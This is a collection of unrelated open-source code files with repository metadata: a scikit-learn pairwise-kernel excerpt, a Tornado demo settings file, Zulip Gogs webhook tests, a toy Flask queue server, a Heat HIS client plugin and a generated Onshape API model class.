    ===============   ========================================
    metric            Function
    ===============   ========================================
    'additive_chi2'   sklearn.pairwise.additive_chi2_kernel
    'chi2'            sklearn.pairwise.chi2_kernel
    'linear'          sklearn.pairwise.linear_kernel
    'poly'            sklearn.pairwise.polynomial_kernel
    'polynomial'      sklearn.pairwise.polynomial_kernel
    'rbf'             sklearn.pairwise.rbf_kernel
    'laplacian'       sklearn.pairwise.laplacian_kernel
    'sigmoid'         sklearn.pairwise.sigmoid_kernel
    'cosine'          sklearn.pairwise.cosine_similarity
    ===============   ========================================
    Read more in the :ref:`User Guide <metrics>`.
    Returns
    -------
    kernel_metrics : dict
        The module-level ``PAIRWISE_KERNEL_FUNCTIONS`` mapping (returned
        directly, not a copy).
    """
    return PAIRWISE_KERNEL_FUNCTIONS
# Keyword parameters (beyond X and Y) accepted by each named kernel; used by
# pairwise_kernels(..., filter_params=True) to drop unsupported kwargs.
KERNEL_PARAMS = {
    "additive_chi2": (),
    "chi2": frozenset(["gamma"]),
    "cosine": (),
    "linear": (),
    "poly": frozenset(["gamma", "degree", "coef0"]),
    "polynomial": frozenset(["gamma", "degree", "coef0"]),
    "rbf": frozenset(["gamma"]),
    "laplacian": frozenset(["gamma"]),
    "sigmoid": frozenset(["gamma", "coef0"]),
}
def pairwise_kernels(
    X, Y=None, metric="linear", *, filter_params=False, n_jobs=None, **kwds
):
    """Compute the kernel between arrays X and optional array Y.
    This method takes either a vector array or a kernel matrix, and returns
    a kernel matrix. If the input is a vector array, the kernels are
    computed. If the input is a kernel matrix, it is returned instead.
    This method provides a safe way to take a kernel matrix as input, while
    preserving compatibility with many other algorithms that take a vector
    array.
    If Y is given (default is None), then the returned matrix is the pairwise
    kernel between the arrays from both X and Y.
    Valid values for metric are:
    ['additive_chi2', 'chi2', 'linear', 'poly', 'polynomial', 'rbf',
    'laplacian', 'sigmoid', 'cosine']
    Read more in the :ref:`User Guide <metrics>`.
    Parameters
    ----------
    X : ndarray of shape (n_samples_X, n_samples_X) or \
            (n_samples_X, n_features)
        Array of pairwise kernels between samples, or a feature array.
        The shape of the array should be (n_samples_X, n_samples_X) if
        metric == "precomputed" and (n_samples_X, n_features) otherwise.
    Y : ndarray of shape (n_samples_Y, n_features), default=None
        A second feature array only if X has shape (n_samples_X, n_features).
    metric : str or callable, default="linear"
        The metric to use when calculating kernel between instances in a
        feature array. If metric is a string, it must be one of the metrics
        in pairwise.PAIRWISE_KERNEL_FUNCTIONS.
        If metric is "precomputed", X is assumed to be a kernel matrix.
        Alternatively, if metric is a callable function, it is called on each
        pair of instances (rows) and the resulting value recorded. The callable
        should take two rows from X as input and return the corresponding
        kernel value as a single number. This means that callables from
        :mod:`sklearn.metrics.pairwise` are not allowed, as they operate on
        matrices, not single samples. Use the string identifying the kernel
        instead.
    filter_params : bool, default=False
        Whether to filter invalid parameters or not.
    n_jobs : int, default=None
        The number of jobs to use for the computation. This works by breaking
        down the pairwise matrix into n_jobs even slices and computing them in
        parallel.
        ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
        ``-1`` means using all processors. See :term:`Glossary <n_jobs>`
        for more details.
    **kwds : optional keyword parameters
        Any further parameters are passed directly to the kernel function.
    Returns
    -------
    K : ndarray of shape (n_samples_X, n_samples_X) or \
            (n_samples_X, n_samples_Y)
        A kernel matrix K such that K_{i, j} is the kernel between the
        ith and jth vectors of the given matrix X, if Y is None.
        If Y is not None, then K_{i, j} is the kernel between the ith array
        from X and the jth array from Y.
    Notes
    -----
    If metric is 'precomputed', Y is ignored and X is returned.
    """
    # import GPKernel locally to prevent circular imports
    from ..gaussian_process.kernels import Kernel as GPKernel

    if metric == "precomputed":
        # X already is the kernel matrix; validate and return it as-is.
        X, _ = check_pairwise_arrays(X, Y, precomputed=True)
        return X
    elif isinstance(metric, GPKernel):
        # Gaussian-process kernel objects are callable on (X, Y) directly.
        func = metric.__call__
    elif metric in PAIRWISE_KERNEL_FUNCTIONS:
        if filter_params:
            # Keep only the kwargs this kernel actually accepts.
            kwds = {k: kwds[k] for k in kwds if k in KERNEL_PARAMS[metric]}
        func = PAIRWISE_KERNEL_FUNCTIONS[metric]
    elif callable(metric):
        # User-supplied per-pair callable, evaluated by _pairwise_callable.
        func = partial(_pairwise_callable, metric=metric, **kwds)
    else:
        raise ValueError("Unknown kernel %r" % metric)
    return _parallel_pairwise(X, Y, func, n_jobs, **kwds)
|
{
"content_hash": "3bb2e5e07fd5415e069afafd195cab50",
"timestamp": "",
"source": "github",
"line_count": 2037,
"max_line_length": 100,
"avg_line_length": 33.72164948453608,
"alnum_prop": 0.6131662080913074,
"repo_name": "shyamalschandra/scikit-learn",
"id": "d493ad68603ea89d0b613947c4f5e0c60b89ecd4",
"size": "69087",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "sklearn/metrics/pairwise.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "C",
"bytes": "394788"
},
{
"name": "C++",
"bytes": "140225"
},
{
"name": "Makefile",
"bytes": "1588"
},
{
"name": "PowerShell",
"bytes": "17312"
},
{
"name": "Python",
"bytes": "6271288"
},
{
"name": "Shell",
"bytes": "6747"
}
],
"symlink_target": ""
}
|
import os
import sys
from tornado.util import ObjectDict
# server name
SERVER_NAME = 'jinja2-support'
# server dir
SERVER_DIR = os.path.dirname(os.path.abspath(__file__))
# project dir
PROJECT_DIR = os.path.dirname(SERVER_DIR)
# Make the project root importable when this server runs as a script.
sys.path.append(PROJECT_DIR)
# tornado web application settings
# details in http://www.tornadoweb.org/en/stable/web.html#tornado.web.Application.settings
WEB_APPLICATION_SETTING = ObjectDict(
    static_path=os.path.join(SERVER_DIR, "static"),
    template_path=os.path.join(SERVER_DIR, "templates"),
    xsrf_cookies=True,
    cookie_secret="3%$334ma?asdf2987^%23&^%$2",
)
# turbo app setting
TURBO_APP_SETTING = ObjectDict(
    log=ObjectDict(
        # Empty dirname means the log file lands in the current working dir.
        log_path=os.path.join("", SERVER_NAME+'.log'),
        log_size=500*1024*1024,  # rotate after 500 MB
        log_count=3,  # keep at most 3 rotated files
    ),
    session_config=ObjectDict({
        'name': 'session-id',
        'secret_key': 'o387xn4ma?adfasdfa83284&^%$2'
    }),
    template='jinja2',
)
# check if app start in debug
# A `__test__` marker file in the server dir switches on tornado debug mode.
if os.path.exists(os.path.join(SERVER_DIR, '__test__')):
    WEB_APPLICATION_SETTING['debug'] = True
    # NOTE(review): this re-assigns the same default log path set above —
    # presumably a placeholder for a debug-specific location; confirm intent.
    TURBO_APP_SETTING.log.log_path = os.path.join("", SERVER_NAME+'.log')
|
{
"content_hash": "cbbf58f1e87ee6f374695c86a97d56be",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 90,
"avg_line_length": 28.675,
"alnum_prop": 0.6756756756756757,
"repo_name": "tao12345666333/app-turbo",
"id": "dfd6860d20b7ef6f0b42540717a6569fdd04880f",
"size": "1147",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "demos/helloworld/jinja2-support/setting.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "1615"
},
{
"name": "JavaScript",
"bytes": "4046"
},
{
"name": "Python",
"bytes": "124548"
}
],
"symlink_target": ""
}
|
from unittest.mock import MagicMock, patch
from zerver.lib.test_classes import WebhookTestCase
from zerver.lib.webhooks.git import COMMITS_LIMIT
class GogsHookTests(WebhookTestCase):
    # Stream webhook notifications are delivered to.
    STREAM_NAME = 'commits'
    # URL pattern for the Gogs integration endpoint.
    URL_TEMPLATE = "/api/v1/external/gogs?&api_key={api_key}&stream={stream}"
    # Directory of JSON payload fixtures used by check_webhook().
    FIXTURE_DIR_NAME = 'gogs'
    def test_push(self) -> None:
        # Single-commit push: topic is "<repo> / <branch>", message shows the
        # compare URL plus the commit list.
        expected_topic = "try-git / master"
        expected_message = """john [pushed](http://localhost:3000/john/try-git/compare/479e6b772b7fba19412457483f50b201286d0103...d8fce16c72a2ff56a5afc8a08645a6ce45491794) 1 commit to branch master. Commits by John (1).
* Webhook Test ([d8fce16](http://localhost:3000/john/try-git/commit/d8fce16c72a2ff56a5afc8a08645a6ce45491794))"""
        self.check_webhook("push", expected_topic, expected_message)
    def test_push_multiple_committers(self) -> None:
        # Push with commits from two authors: the summary line credits both.
        commit_info = '* Webhook Test ([d8fce16](http://localhost:3000/john/try-git/commit/d8fce16c72a2ff56a5afc8a08645a6ce45491794))\n'
        expected_topic = "try-git / master"
        expected_message = f"""john [pushed](http://localhost:3000/john/try-git/compare/479e6b772b7fba19412457483f50b201286d0103...d8fce16c72a2ff56a5afc8a08645a6ce45491794) 2 commits to branch master. Commits by Benjamin (1) and John (1).\n\n{commit_info}* Webhook Test ([d8fce16](http://localhost:3000/john/try-git/commit/d8fce16c72a2ff56a5afc8a08645a6ce45491794))"""
        self.check_webhook("push__commits_multiple_committers", expected_topic, expected_message)
    def test_push_multiple_committers_filtered_by_branches(self) -> None:
        # Same multi-committer payload, with a branch filter that includes
        # "master" — so the notification still goes through.
        self.url = self.build_webhook_url(branches='master,development')
        commit_info = '* Webhook Test ([d8fce16](http://localhost:3000/john/try-git/commit/d8fce16c72a2ff56a5afc8a08645a6ce45491794))\n'
        expected_topic = "try-git / master"
        expected_message = f"""john [pushed](http://localhost:3000/john/try-git/compare/479e6b772b7fba19412457483f50b201286d0103...d8fce16c72a2ff56a5afc8a08645a6ce45491794) 2 commits to branch master. Commits by Benjamin (1) and John (1).\n\n{commit_info}* Webhook Test ([d8fce16](http://localhost:3000/john/try-git/commit/d8fce16c72a2ff56a5afc8a08645a6ce45491794))"""
        self.check_webhook("push__commits_multiple_committers", expected_topic, expected_message)
    def test_push_filtered_by_branches(self) -> None:
        # Branch filter includes "master", so the push notification is sent.
        self.url = self.build_webhook_url(branches='master,development')
        expected_topic = "try-git / master"
        expected_message = """john [pushed](http://localhost:3000/john/try-git/compare/479e6b772b7fba19412457483f50b201286d0103...d8fce16c72a2ff56a5afc8a08645a6ce45491794) 1 commit to branch master. Commits by John (1).
* Webhook Test ([d8fce16](http://localhost:3000/john/try-git/commit/d8fce16c72a2ff56a5afc8a08645a6ce45491794))"""
        self.check_webhook("push", expected_topic, expected_message)
    def test_push_commits_more_than_limits(self) -> None:
        # Pushes above COMMITS_LIMIT are truncated with an "[and N more
        # commit(s)]" suffix.
        expected_topic = "try-git / master"
        commits_info = "* Webhook Test ([d8fce16](http://localhost:3000/john/try-git/commit/d8fce16c72a2ff56a5afc8a08645a6ce45491794))\n"
        expected_message = f"john [pushed](http://localhost:3000/john/try-git/compare/479e6b772b7fba19412457483f50b201286d0103...d8fce16c72a2ff56a5afc8a08645a6ce45491794) 30 commits to branch master. Commits by John (30).\n\n{commits_info * COMMITS_LIMIT}[and {30 - COMMITS_LIMIT} more commit(s)]"
        self.check_webhook("push__commits_more_than_limits", expected_topic, expected_message)
    def test_push_commits_more_than_limits_filtered_by_branches(self) -> None:
        # Truncation behavior is unchanged when a matching branch filter is
        # configured.
        self.url = self.build_webhook_url(branches='master,development')
        expected_topic = "try-git / master"
        commits_info = "* Webhook Test ([d8fce16](http://localhost:3000/john/try-git/commit/d8fce16c72a2ff56a5afc8a08645a6ce45491794))\n"
        expected_message = f"john [pushed](http://localhost:3000/john/try-git/compare/479e6b772b7fba19412457483f50b201286d0103...d8fce16c72a2ff56a5afc8a08645a6ce45491794) 30 commits to branch master. Commits by John (30).\n\n{commits_info * COMMITS_LIMIT}[and {30 - COMMITS_LIMIT} more commit(s)]"
        self.check_webhook("push__commits_more_than_limits", expected_topic, expected_message)
def test_new_branch(self) -> None:
expected_topic = "try-git / my_feature"
expected_message = "john created [my_feature](http://localhost:3000/john/try-git/src/my_feature) branch."
self.check_webhook("create__branch", expected_topic, expected_message)
def test_pull_request_opened(self) -> None:
    """Opening a PR reports the author, PR number, and branch direction."""
    self.check_webhook(
        "pull_request__opened",
        "try-git / PR #1 Title Text for Pull Request",
        "john opened [PR #1](http://localhost:3000/john/try-git/pulls/1) from `feature` to `master`.",
    )
def test_pull_request_opened_with_custom_topic_in_url(self) -> None:
    """A topic in the webhook URL overrides the default repo/PR topic."""
    self.url = self.build_webhook_url(topic='notifications')
    self.check_webhook(
        "pull_request__opened",
        "notifications",
        "john opened [PR #1 Title Text for Pull Request](http://localhost:3000/john/try-git/pulls/1) from `feature` to `master`.",
    )
def test_pull_request_closed(self) -> None:
    """Closing a PR produces a 'closed' notification."""
    self.check_webhook(
        "pull_request__closed",
        "try-git / PR #1 Title Text for Pull Request",
        "john closed [PR #1](http://localhost:3000/john/try-git/pulls/1) from `feature` to `master`.",
    )
def test_pull_request_merged(self) -> None:
    """Merging a PR produces a 'merged' notification."""
    self.check_webhook(
        "pull_request__merged",
        "try-git / PR #2 Title Text for Pull Request",
        "john merged [PR #2](http://localhost:3000/john/try-git/pulls/2) from `feature` to `master`.",
    )
def test_pull_request_reopened(self) -> None:
    """Reopening a PR produces a 'reopened' notification."""
    self.check_webhook(
        "pull_request__reopened",
        "test / PR #1349 reopened",
        "kostekIV reopened [PR #2](https://try.gogs.io/kostekIV/test/pulls/2) from `c` to `master`.",
    )
def test_pull_request_edited(self) -> None:
    """Editing a PR produces an 'edited' notification."""
    self.check_webhook(
        "pull_request__edited",
        "test / PR #1349 Test",
        "kostekIV edited [PR #2](https://try.gogs.io/kostekIV/test/pulls/2) from `c` to `master`.",
    )
def test_pull_request_assigned(self) -> None:
    """Assigning a PR produces an 'assigned' notification."""
    self.check_webhook(
        "pull_request__assigned",
        "test / PR #1349 Test",
        "kostekIV assigned [PR #2](https://try.gogs.io/kostekIV/test/pulls/2) from `c` to `master`.",
    )
def test_pull_request_synchronized(self) -> None:
    """Synchronizing a PR produces a 'synchronized' notification."""
    self.check_webhook(
        "pull_request__synchronized",
        "test / PR #1349 Test",
        "kostekIV synchronized [PR #2](https://try.gogs.io/kostekIV/test/pulls/2) from `c` to `master`.",
    )
def test_issues_opened(self) -> None:
    """Opening an issue quotes its body in the notification."""
    self.check_webhook(
        "issues__opened",
        "test / Issue #3 New test issue",
        "kostekIV opened [Issue #3](https://try.gogs.io/kostekIV/test/issues/3):\n\n~~~ quote\nTest\n~~~",
    )
def test_issues_reopened(self) -> None:
    """Reopening an issue quotes its body in the notification."""
    self.check_webhook(
        "issues__reopened",
        "test / Issue #3 New test issue",
        "kostekIV reopened [Issue #3](https://try.gogs.io/kostekIV/test/issues/3):\n\n~~~ quote\nTest\n~~~",
    )
def test_issues_edited(self) -> None:
    """Editing an issue quotes the updated body."""
    self.check_webhook(
        "issues__edited",
        "test / Issue #3 New test issue",
        "kostekIV edited [Issue #3](https://try.gogs.io/kostekIV/test/issues/3):\n\n~~~ quote\nTest edit\n~~~",
    )
def test_issues_assignee(self) -> None:
    """Assigning an issue includes the assignee in the notification."""
    self.check_webhook(
        "issues__assigned",
        "test / Issue #3 New test issue",
        "kostekIV assigned [Issue #3](https://try.gogs.io/kostekIV/test/issues/3) (assigned to kostekIV):\n\n~~~ quote\nTest\n~~~",
    )
def test_issues_closed(self) -> None:
    """Closing an issue quotes the closing comment."""
    self.check_webhook(
        "issues__closed",
        "test / Issue #3 New test issue",
        "kostekIV closed [Issue #3](https://try.gogs.io/kostekIV/test/issues/3):\n\n~~~ quote\nClosed #3\n~~~",
    )
def test_issue_comment_new(self) -> None:
    """A new issue comment links both the comment and the issue."""
    self.check_webhook(
        "issue_comment__new",
        "test / Issue #3 New test issue",
        "kostekIV [commented](https://try.gogs.io/kostekIV/test/issues/3#issuecomment-3635) on [Issue #3](https://try.gogs.io/kostekIV/test/issues/3):\n\n~~~ quote\nTest comment\n~~~",
    )
def test_issue_comment_edited(self) -> None:
    """An edited issue comment links both the comment and the issue."""
    self.check_webhook(
        "issue_comment__edited",
        "test / Issue #3 New test issue",
        "kostekIV edited a [comment](https://try.gogs.io/kostekIV/test/issues/3#issuecomment-3634) on [Issue #3](https://try.gogs.io/kostekIV/test/issues/3):\n\n~~~ quote\nedit comment\n~~~",
    )
def test_release_published(self) -> None:
    """Publishing a release reports the release title and tag."""
    self.check_webhook(
        "release__published",
        "zulip_test / v1.4 Title",
        "cestrell published release [Title](https://try.gogs.io/cestrell/zulip_test) for tag v1.4.",
    )
@patch('zerver.webhooks.gogs.view.check_send_webhook_message')
def test_push_filtered_by_branches_ignore(self, check_send_webhook_message_mock: MagicMock) -> None:
    """A push to a branch outside the configured filter sends no message."""
    self.url = self.build_webhook_url(branches='changes,development')
    response = self.client_post(
        self.url,
        self.get_body('push'),
        HTTP_X_GOGS_EVENT='push',
        content_type="application/json",
    )
    # The endpoint must still return success even though nothing is sent.
    self.assertFalse(check_send_webhook_message_mock.called)
    self.assert_json_success(response)
@patch('zerver.webhooks.gogs.view.check_send_webhook_message')
def test_push_commits_more_than_limits_filtered_by_branches_ignore(
        self, check_send_webhook_message_mock: MagicMock) -> None:
    """A large push to a filtered-out branch sends no message."""
    self.url = self.build_webhook_url(branches='changes,development')
    response = self.client_post(
        self.url,
        self.get_body('push__commits_more_than_limits'),
        HTTP_X_GOGS_EVENT='push',
        content_type="application/json",
    )
    # The endpoint must still return success even though nothing is sent.
    self.assertFalse(check_send_webhook_message_mock.called)
    self.assert_json_success(response)
@patch('zerver.webhooks.gogs.view.check_send_webhook_message')
def test_push_multiple_committers_filtered_by_branches_ignore(
        self, check_send_webhook_message_mock: MagicMock) -> None:
    """A multi-committer push to a filtered-out branch sends no message."""
    self.url = self.build_webhook_url(branches='changes,development')
    response = self.client_post(
        self.url,
        self.get_body('push__commits_multiple_committers'),
        HTTP_X_GOGS_EVENT='push',
        content_type="application/json",
    )
    # The endpoint must still return success even though nothing is sent.
    self.assertFalse(check_send_webhook_message_mock.called)
    self.assert_json_success(response)
|
{
"content_hash": "3f2728853a508b2cfd801d8aae5f145a",
"timestamp": "",
"source": "github",
"line_count": 166,
"max_line_length": 368,
"avg_line_length": 69.99397590361446,
"alnum_prop": 0.6918839831310784,
"repo_name": "showell/zulip",
"id": "c8f867e60f368d3c8ac4f122b8efac4650c5a58a",
"size": "11619",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "zerver/webhooks/gogs/tests.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "433235"
},
{
"name": "Dockerfile",
"bytes": "2941"
},
{
"name": "Emacs Lisp",
"bytes": "157"
},
{
"name": "HTML",
"bytes": "634357"
},
{
"name": "Handlebars",
"bytes": "235334"
},
{
"name": "JavaScript",
"bytes": "3341135"
},
{
"name": "Perl",
"bytes": "8594"
},
{
"name": "Puppet",
"bytes": "79720"
},
{
"name": "Python",
"bytes": "8120030"
},
{
"name": "Ruby",
"bytes": "8480"
},
{
"name": "Shell",
"bytes": "133132"
},
{
"name": "TypeScript",
"bytes": "20603"
}
],
"symlink_target": ""
}
|
from flask import Flask, request, jsonify
from collections import deque
import sys
app = Flask(__name__)
# Module-level FIFO queue shared by every request handler below.
queue = deque([])
@app.route('/init', methods=['GET', 'POST'])
def initialize():
    """Replace the queue contents with the JSON list posted by the client.

    Expects a JSON body of the form ``{"list": [...]}``. Non-POST requests
    get a plain error string, matching the other endpoints.

    Fixes: removed a stray semicolon and dead commented-out code, and
    corrected the typo "intialized" in the response message.
    """
    if request.method == 'POST':
        global queue
        data = request.get_json()
        queue = deque(data['list'])
        resp = {
            "Message": "Queue initialized",
            "queue": list(queue),
        }
        return jsonify(resp)
    else:
        return "Error!"
@app.route('/query', methods=['GET', 'POST'])
def query():
    """Pop and return the oldest element; ``data: -1`` signals an empty queue."""
    global queue
    if request.method not in ('GET', 'POST'):
        return 'Error'
    # An empty deque is falsy, so this is equivalent to len(queue) == 0.
    value = queue.popleft() if queue else -1
    return jsonify({
        'data': value,
        'success': True
    })
@app.route('/enqueue', methods=['GET', 'POST'])
def enqueue():
    """Append one element (JSON body ``{"data": ...}``) to the queue tail.

    Bug fix: the original returned ``queue.append(...)``, which is always
    ``None``, so the response 'data' field was always null. The enqueued
    value is now echoed back.
    """
    global queue
    if request.method == 'GET' or request.method == 'POST':
        data = request.get_json()
        ele = data['data']
        queue.append(ele)
        return jsonify({
            'data': ele,
            'success': True
        })
    else:
        return 'Error'
@app.route('/enqueue_list', methods=['GET', 'POST'])
def enqueue_list():
    """Append every element of the posted list (``{"data": [...]}``) to the queue.

    Bug fixes: the original rejected the request when the queue was *empty*
    — an inverted check, since extending an empty queue is valid — and
    returned ``queue.extend(...)``, which is always ``None``. The appended
    list is now echoed back.
    """
    global queue
    if request.method == 'GET' or request.method == 'POST':
        data = request.get_json()
        items = data['data']
        queue.extend(items)
        return jsonify({
            'data': items,
            'success': True
        })
    else:
        return 'Error'
@app.route('/size', methods=['GET', 'POST'])
def size():
    """Report the current number of queued elements."""
    global queue
    if request.method not in ('GET', 'POST'):
        return 'Error'
    return jsonify({
        'Size': len(queue),
        'Message': 'Size of queue'
    })
@app.route('/clear', methods=['GET'])
def clearQueue():
    """Drop every queued element, leaving an empty queue."""
    global queue
    if request.method != 'GET':
        return 'Error!'
    queue = deque()
    return jsonify({
        'Message': 'Queue successfully cleared'
    })
@app.route('/check', methods=['GET'])
def checkQueue():
    """Return the full queue contents without consuming them."""
    global queue
    if request.method != 'GET':
        return 'Error!'
    return jsonify({
        'Queue': list(queue)
    })
if __name__ == "__main__":
    print("Server Running")
    # Optional single CLI argument overrides the default port.
    server_port = int(sys.argv[1]) if len(sys.argv) == 2 else 7979
    app.run(host='0.0.0.0', port=server_port)
|
{
"content_hash": "3373b3a0b41c04f7810d749ce9ca6d2f",
"timestamp": "",
"source": "github",
"line_count": 115,
"max_line_length": 56,
"avg_line_length": 19.643478260869564,
"alnum_prop": 0.6007082779991146,
"repo_name": "fossdevil/Assignments",
"id": "7dd2382fc06072a92785d7eeef01618f3193caf2",
"size": "2259",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Miscellaneous/services/queue/queue_server.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "2425793"
},
{
"name": "Python",
"bytes": "61303"
},
{
"name": "TeX",
"bytes": "45679"
},
{
"name": "Vim script",
"bytes": "15369"
}
],
"symlink_target": ""
}
|
from hisclient import exc
from hisclient.v2.client import Client as his_cli
from conveyor.conveyorheat.engine.clients import client_plugin
from conveyor.conveyorheat.engine import constraints
class HISClientPlugin(client_plugin.ClientPlugin):
    """Heat client plugin that builds authenticated HIS API clients."""

    exceptions_module = exc

    # Single service type; the assignment exposes it both as the list and
    # as the HIS constant.
    service_types = [HIS] = ['his']

    def _create(self):
        """Instantiate an HIS client from the plugin's 'his' config options."""
        def option(name):
            return self._get_client_option('his', name)

        args = {
            'token': self.auth_token,
            'insecure': option('insecure'),
            'timeout': option('timeout'),
            'cacert': option('ca_file'),
            'cert': option('cert_file'),
            'key': option('key_file'),
            'ssl_compression': False,
        }
        return his_cli(endpoint=option('url'), **args)
class HISConstraint(constraints.BaseCustomConstraint):
    # Validate constrained values via the 'his' client plugin registered above.
    resource_client_name = 'his'
    # Client method used to resolve the value during validation.
    resource_getter_name = 'find_image_by_id'
|
{
"content_hash": "6991487e50b6b87885ab12e9cf13a538",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 67,
"avg_line_length": 34.724137931034484,
"alnum_prop": 0.6355511420059583,
"repo_name": "Hybrid-Cloud/conveyor",
"id": "925a292fe77267187260deec0b7044a22dc2f006",
"size": "1582",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "conveyor/conveyorheat/engine/clients/huawei/his.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3789174"
},
{
"name": "Shell",
"bytes": "16567"
}
],
"symlink_target": ""
}
|
"""
Onshape REST API
The Onshape REST API consumed by all clients. # noqa: E501
The version of the OpenAPI document: 1.113
Contact: api-support@onshape.zendesk.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from onshape_client.oas.model_utils import ( # noqa: F401
ModelComposed,
ModelNormal,
ModelSimple,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
try:
from onshape_client.oas.models import bt_parameter_spec6
except ImportError:
bt_parameter_spec6 = sys.modules["onshape_client.oas.models.bt_parameter_spec6"]
try:
from onshape_client.oas.models import bt_parameter_spec_array2600_all_of
except ImportError:
bt_parameter_spec_array2600_all_of = sys.modules[
"onshape_client.oas.models.bt_parameter_spec_array2600_all_of"
]
try:
from onshape_client.oas.models import bt_parameter_visibility_condition177
except ImportError:
bt_parameter_visibility_condition177 = sys.modules[
"onshape_client.oas.models.bt_parameter_visibility_condition177"
]
try:
from onshape_client.oas.models import btm_parameter1
except ImportError:
btm_parameter1 = sys.modules["onshape_client.oas.models.btm_parameter1"]
class BTParameterSpecArray2600(ModelComposed):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.

    Attributes:
      allowed_values (dict): The key is the tuple path to the attribute
          and the for var_name this is (var_name,). The value is a dict
          with a capitalized key describing the allowed value and an allowed
          value. These dicts store the allowed enum values.
      attribute_map (dict): The key is attribute name
          and the value is json key in definition.
      discriminator_value_class_map (dict): A dict to go from the discriminator
          variable value to the discriminator class name.
      validations (dict): The key is the tuple path to the attribute
          and the for var_name this is (var_name,). The value is a dict
          that stores validations for max_length, min_length, max_items,
          min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
          inclusive_minimum, and regex.
      additional_properties_type (tuple): A tuple of classes accepted
          as additional properties values.
    """

    # Enum values accepted for each entry of the 'ui_hints' list.
    allowed_values = {
        ("ui_hints",): {
            "OPPOSITE_DIRECTION": "OPPOSITE_DIRECTION",
            "ALWAYS_HIDDEN": "ALWAYS_HIDDEN",
            "SHOW_CREATE_SELECTION": "SHOW_CREATE_SELECTION",
            "CONTROL_VISIBILITY": "CONTROL_VISIBILITY",
            "NO_PREVIEW_PROVIDED": "NO_PREVIEW_PROVIDED",
            "REMEMBER_PREVIOUS_VALUE": "REMEMBER_PREVIOUS_VALUE",
            "DISPLAY_SHORT": "DISPLAY_SHORT",
            "ALLOW_FEATURE_SELECTION": "ALLOW_FEATURE_SELECTION",
            "MATE_CONNECTOR_AXIS_TYPE": "MATE_CONNECTOR_AXIS_TYPE",
            "PRIMARY_AXIS": "PRIMARY_AXIS",
            "SHOW_EXPRESSION": "SHOW_EXPRESSION",
            "OPPOSITE_DIRECTION_CIRCULAR": "OPPOSITE_DIRECTION_CIRCULAR",
            "SHOW_LABEL": "SHOW_LABEL",
            "HORIZONTAL_ENUM": "HORIZONTAL_ENUM",
            "UNCONFIGURABLE": "UNCONFIGURABLE",
            "MATCH_LAST_ARRAY_ITEM": "MATCH_LAST_ARRAY_ITEM",
            "COLLAPSE_ARRAY_ITEMS": "COLLAPSE_ARRAY_ITEMS",
            "INITIAL_FOCUS_ON_EDIT": "INITIAL_FOCUS_ON_EDIT",
            "INITIAL_FOCUS": "INITIAL_FOCUS",
            "DISPLAY_CURRENT_VALUE_ONLY": "DISPLAY_CURRENT_VALUE_ONLY",
            "READ_ONLY": "READ_ONLY",
            "PREVENT_CREATING_NEW_MATE_CONNECTORS": "PREVENT_CREATING_NEW_MATE_CONNECTORS",
            "FIRST_IN_ROW": "FIRST_IN_ROW",
            "ALLOW_QUERY_ORDER": "ALLOW_QUERY_ORDER",
            "PREVENT_ARRAY_REORDER": "PREVENT_ARRAY_REORDER",
            "UNKNOWN": "UNKNOWN",
        },
    }

    # No extra validation rules are generated for this model.
    validations = {}

    # Additional (undeclared) properties are not accepted.
    additional_properties_type = None

    @staticmethod
    def openapi_types():
        """
        This must be a class method so a model may have properties that are
        of type self, this ensures that we don't create a cyclic import

        Returns
            openapi_types (dict): The key is attribute name
                and the value is attribute type.
        """
        return {
            "bt_type": (str,),  # noqa: E501
            "driven_query": (str,),  # noqa: E501
            "item_label_template": (str,),  # noqa: E501
            "item_name": (str,),  # noqa: E501
            "additional_localized_strings": (int,),  # noqa: E501
            "column_name": (str,),  # noqa: E501
            "default_value": (btm_parameter1.BTMParameter1,),  # noqa: E501
            "icon_uri": (str,),  # noqa: E501
            "localizable_name": (str,),  # noqa: E501
            "localized_name": (str,),  # noqa: E501
            "parameter_id": (str,),  # noqa: E501
            "parameter_name": (str,),  # noqa: E501
            "strings_to_localize": ([str],),  # noqa: E501
            "ui_hint": (str,),  # noqa: E501
            "ui_hints": ([str],),  # noqa: E501
            "visibility_condition": (
                bt_parameter_visibility_condition177.BTParameterVisibilityCondition177,
            ),  # noqa: E501
        }

    @staticmethod
    def discriminator():
        # This composed model has no discriminator field.
        return None

    # Maps Python attribute names to their JSON keys in the API payload.
    attribute_map = {
        "bt_type": "btType",  # noqa: E501
        "driven_query": "drivenQuery",  # noqa: E501
        "item_label_template": "itemLabelTemplate",  # noqa: E501
        "item_name": "itemName",  # noqa: E501
        "additional_localized_strings": "additionalLocalizedStrings",  # noqa: E501
        "column_name": "columnName",  # noqa: E501
        "default_value": "defaultValue",  # noqa: E501
        "icon_uri": "iconUri",  # noqa: E501
        "localizable_name": "localizableName",  # noqa: E501
        "localized_name": "localizedName",  # noqa: E501
        "parameter_id": "parameterId",  # noqa: E501
        "parameter_name": "parameterName",  # noqa: E501
        "strings_to_localize": "stringsToLocalize",  # noqa: E501
        "ui_hint": "uiHint",  # noqa: E501
        "ui_hints": "uiHints",  # noqa: E501
        "visibility_condition": "visibilityCondition",  # noqa: E501
    }

    # Internal bookkeeping attributes that must never be treated as model
    # properties.
    required_properties = set(
        [
            "_data_store",
            "_check_type",
            "_from_server",
            "_path_to_item",
